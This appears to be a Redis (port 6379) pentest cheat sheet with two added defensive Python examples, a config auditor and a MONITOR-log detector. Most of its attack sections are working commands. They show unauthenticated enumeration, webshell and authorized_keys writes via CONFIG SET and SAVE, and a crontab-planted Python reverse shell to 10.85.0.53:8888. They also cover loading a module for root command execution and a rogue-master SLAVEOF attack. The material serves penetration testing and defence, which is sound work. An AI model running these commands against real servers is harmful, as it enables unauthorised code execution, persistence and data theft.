Port Enumeration – 6379/REDIS


Enumeration using nmap

nmap:
nmap --script redis-info -sV -p 6379 10.10.10.10

Manual enumeration
netcat and redis-cli:
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools

Output: you will either get information back or the error -NOAUTH Authentication required.

By default Redis can be accessed without credentials. However, it can be configured to require only a password, or a username and a password.

If only a password is configured, the username used is "default".

Also note that there is no way to tell from outside whether Redis was configured with only a password or with username + password.
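
As an added defensive counterpart to the points above (this is example code written for this page, not from the original cheat-sheet or from Redis itself), the following Python audits a redis.conf for the exposures this page relies on: no authentication, listening on every interface, protected mode off, and the CONFIG and MODULE commands still reachable. The two configurations embedded in it are constructed samples; the password in the hardened one is a placeholder, and the `-::1` bind syntax and `enable-module-command` directive are Redis 7 features (on older versions MODULE can only be removed with rename-command).

```python
"""Audit a redis.conf for the exposure described above (added example).

Checks: protected mode, bind scope, authentication, and whether the CONFIG and
MODULE commands (the levers behind the RDB-write and module-load techniques)
are still reachable.
"""
import shlex

# bind values that mean "every interface" (a leading '-' is Redis 7 optional-address syntax)
ALL_INTERFACES = {"0.0.0.0", "*", "::", "::*"}

# Constructed sample: the exposed deployment the enumeration section expects to find.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed sample: the same server hardened. The password is a placeholder.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass <LONG-RANDOM-PASSWORD-PLACEHOLDER>
rename-command CONFIG ""
rename-command MODULE ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
enable-module-command no
dir /var/lib/redis
"""


def parse_conf(text):
    """Return {directive: [argv, ...]}; repeatable directives (rename-command) keep every entry."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        argv = shlex.split(line)  # redis.conf quoting is close enough to shell quoting
        conf.setdefault(argv[0].lower(), []).append(argv[1:])
    return conf


def command_removed(conf, command):
    """True when 'rename-command <command> ""' deletes the command entirely."""
    return any(len(argv) == 2 and argv[0].upper() == command and argv[1] == ""
               for argv in conf.get("rename-command", []))


def audit(text):
    """Return a list of (directive, problem) pairs; an empty list means no finding."""
    conf = parse_conf(text)
    findings = []

    # protected-mode defaults to yes since Redis 3.2; only an explicit "no" is a finding
    protected = conf.get("protected-mode", [["yes"]])[-1]
    if protected and protected[0].lower() == "no":
        findings.append(("protected-mode", "disabled: unauthenticated clients from any address are served"))

    # with no bind directive Redis listens on all interfaces
    binds = [b.lstrip("-") for argv in conf.get("bind", [["*"]]) for b in argv]
    if any(b in ALL_INTERFACES for b in binds):
        findings.append(("bind", "listens on all interfaces: " + " ".join(binds)))

    # no requirepass, no ACL users and no aclfile: the 'default' user needs no credentials
    if not any(key in conf for key in ("requirepass", "user", "aclfile")):
        findings.append(("requirepass", "no password or ACL; the default user has full access without AUTH"))

    # CONFIG SET dir/dbfilename + SAVE is the primitive behind the webshell, ssh and crontab writes
    if not command_removed(conf, "CONFIG"):
        findings.append(("rename-command", 'CONFIG still available; add: rename-command CONFIG ""'))

    # MODULE LOAD: Redis 7 disables it via enable-module-command no; older versions need rename-command
    module_setting = conf.get("enable-module-command", [[""]])[-1][0].lower()
    if module_setting != "no" and not command_removed(conf, "MODULE"):
        findings.append(("enable-module-command", "MODULE LOAD permitted; set enable-module-command no or rename MODULE away"))

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{name}]")
        for directive, problem in audit(text) or [("ok", "no findings")]:
            print(f"  {directive}: {problem}")
```

The single setting that removes every RCE path described further down is `rename-command CONFIG ""` (or, on Redis 6+, an ACL that denies the `@dangerous` category to the application user); `requirepass` alone only raises the bar for the enumeration step.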

AUTH

To check whether credentials are valid:

AUTH <password>
AUTH <username> <password>

Valid credentials are answered with: +OK

Authenticated enumeration

redis-cli:

INFO
[ … Redis response with info … ]
client list
[ … Redis response with connected clients … ]
CONFIG GET *
[ … Get config … ]

For other redis commands: https://redis.io/topics/data-types-intro, https://lzone.de/cheat-sheet/Redis

Dumping Database

redis-cli:

Inside Redis, databases are numbered starting from 0. You can see which ones are in use in the output of the info command, in the "Keyspace" section:

SELECT 1
[ … Indicate the database … ]
KEYS *
[ … Get Keys … ]
GET <key>
[ … Get Key … ]

Dump the database with npm redis-dump (https://www.npmjs.com/package/redis-dump) or python redis-utils (https://pypi.org/project/redis-utils/).

Redis RCE – webshell

redis-cli:

From: http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html

You must know the path of the web site folder:

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test ""
OK
10.85.0.52:6379> save
OK

If accessing the webshell gives an error, you can empty the database after backing it up and try again; remember to restore the database afterwards.

Redis RCE – ssh

redis-cli:

Be aware that the result of config get dir can change after other manual exploitation commands, so run it first, right after logging into Redis.

In the output of config get dir you may find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh); knowing this, you know where you can write the authorized_keys file to access the box via ssh as the redis user.

If you know the home directory of another valid user where you have write permissions, you can abuse that as well:

  1. Generate a ssh public-private key pair on your pc: ssh-keygen -t rsa
  2. Write the public key to a file : (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
  3. Import the file into redis : cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
  4. Save the public key to the authorized_keys file on redis server:
    root@Urahara:~# redis-cli -h 10.85.0.52
    10.85.0.52:6379> config set dir /var/lib/redis/.ssh
    OK
    10.85.0.52:6379> config set dbfilename "authorized_keys"
    OK
    10.85.0.52:6379> save
    OK
  5. Finally, you can ssh to the redis server with private key : ssh -i id_rsa redis@10.85.0.52

Redis RCE – crontab

redis-cli:
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK

The last example is for Ubuntu; on CentOS the corresponding command is:

    redis-cli -h 10.85.0.52 config set dir /var/spool/cron/

Redis RCE – load redis module

  1. Following the instructions from https://github.com/n0b0dyCN/RedisModules-ExecuteCommand you can compile a redis module to execute arbitrary commands.
  2. Then you need some way to upload the compiled module
  3. Load the uploaded module at runtime with MODULE LOAD /path/to/mymodule.so
  4. List loaded modules to check it was correctly loaded: MODULE LIST
  5. Execute commands:
    127.0.0.1:6379> system.exec "id"
    "uid=0(root) gid=0(root) groups=0(root)\n"
    127.0.0.1:6379> system.exec "whoami"
    "root\n"
    127.0.0.1:6379> system.rev 127.0.0.1 9999
  6. Unload the module whenever you want: MODULE UNLOAD mymodule

Lua sandbox bypass

Check hacktricks for more info

Master-Slave replication Module

All operations on the master Redis are automatically synchronized to its slaves. This means the vulnerable Redis can be made a slave of a master Redis that we control; anything written to our own Redis is then replicated to the target.

    master redis : 10.85.0.51 (Hacker's Server)
    slave  redis : 10.85.0.52 (Target Vulnerability Server)

    A master-slave connection is established from the slave redis to the master redis:
    redis-cli -h 10.85.0.52 -p 6379
    slaveof 10.85.0.51 6379

    Then you can log into the master redis to control the slave redis:
    redis-cli -h 10.85.0.51 -p 6379
    set mykey hello
    set mykey2 helloworld
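
Every technique in the RCE sections above leaves the same small set of commands in Redis's own MONITOR stream: CONFIG SET dir / CONFIG SET dbfilename followed by SAVE, SLAVEOF or REPLICAOF pointing at a foreign host, and MODULE LOAD. As an added example (written for this page, not part of the original text or of Redis), the Python below parses MONITOR output in its documented `<timestamp> [<db> <client>] "CMD" "arg" ...` format and flags those patterns, correlating the CONFIG SET / SAVE pair per client. The sample lines are constructed, reusing the addresses and paths that appear on this page.

```python
"""Flag the command patterns behind the RCE sections above in Redis MONITOR output (added example)."""
import re
import shlex

# MONITOR line format: <unix-time> [<db> <client-addr>] "CMD" "arg1" "arg2" ...
MONITOR_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.+)$')

# Constructed sample (not a real capture); addresses and paths reuse the ones on this page.
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.85.0.53:51000] "INFO"
1700000001.200000 [0 10.85.0.53:51000] "CONFIG" "GET" "dir"
1700000002.300000 [0 10.85.0.53:51000] "CONFIG" "SET" "dir" "/var/lib/redis/.ssh"
1700000003.400000 [0 10.85.0.53:51000] "CONFIG" "SET" "dbfilename" "authorized_keys"
1700000004.500000 [0 10.85.0.53:51000] "SAVE"
1700000005.600000 [0 10.0.0.7:40212] "SET" "session:42" "opaque-value"
1700000006.700000 [0 10.85.0.53:51001] "SLAVEOF" "10.85.0.51" "6379"
1700000007.800000 [0 10.85.0.53:51002] "MODULE" "LOAD" "/tmp/mymodule.so"
1700000008.900000 [0 10.0.0.7:40212] "GET" "session:42"
1700000009.000000 [0 10.85.0.53:51001] "SLAVEOF" "NO" "ONE"
"""


def parse_monitor_line(line):
    """Split one MONITOR line into its fields, or return None for anything else (e.g. the 'OK' banner)."""
    m = MONITOR_LINE.match(line.strip())
    if not m:
        return None
    argv = shlex.split(m.group("rest"))  # MONITOR quotes every argument
    if not argv:
        return None
    return {"ts": float(m.group("ts")), "db": int(m.group("db")),
            "client": m.group("client"), "cmd": argv[0].upper(), "args": argv[1:]}


def classify(cmd, args):
    """Return a reason string when a single command is suspicious on its own, else None."""
    upper = [a.upper() for a in args]
    if cmd == "CONFIG" and len(args) >= 3 and upper[0] == "SET" and upper[1] in ("DIR", "DBFILENAME"):
        return f"CONFIG SET {args[1]} -> {args[2]}"          # redirects where SAVE writes the RDB file
    if cmd in ("SLAVEOF", "REPLICAOF") and upper[:2] != ["NO", "ONE"]:
        return "replication redirected to " + " ".join(args)  # server now takes data from a foreign master
    if cmd == "MODULE" and upper[:1] == ["LOAD"]:
        return "module loaded from " + (args[1] if len(args) > 1 else "?")
    return None


def analyze(monitor_text):
    """Return (ts, client, severity, reason) tuples; a SAVE after CONFIG SET dir/dbfilename is 'critical'."""
    findings = []
    staged = {}  # client -> CONFIG SET changes not yet followed by a SAVE/BGSAVE
    for line in monitor_text.splitlines():
        event = parse_monitor_line(line)
        if event is None:
            continue
        reason = classify(event["cmd"], event["args"])
        if reason:
            findings.append((event["ts"], event["client"], "suspicious", reason))
            if event["cmd"] == "CONFIG":
                staged.setdefault(event["client"], []).append(reason)
        elif event["cmd"] in ("SAVE", "BGSAVE") and event["client"] in staged:
            findings.append((event["ts"], event["client"], "critical",
                             "RDB written after " + "; ".join(staged.pop(event["client"]))))
    return findings


if __name__ == "__main__":
    for ts, client, severity, reason in analyze(SAMPLE_MONITOR):
        print(f"{ts:.3f} {client:<20} {severity:<10} {reason}")
```

MONITOR noticeably reduces throughput, so this is for a lab or an incident investigation rather than permanent production use; the parser works equally on a saved file of MONITOR output. A legitimate `SLAVEOF NO ONE` (promoting a replica) is deliberately not flagged, and `CONFIG SET` of other parameters is ignored so that routine tuning does not drown the signal.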

For GitLab SSRF to Redis RCE, check hacktricks.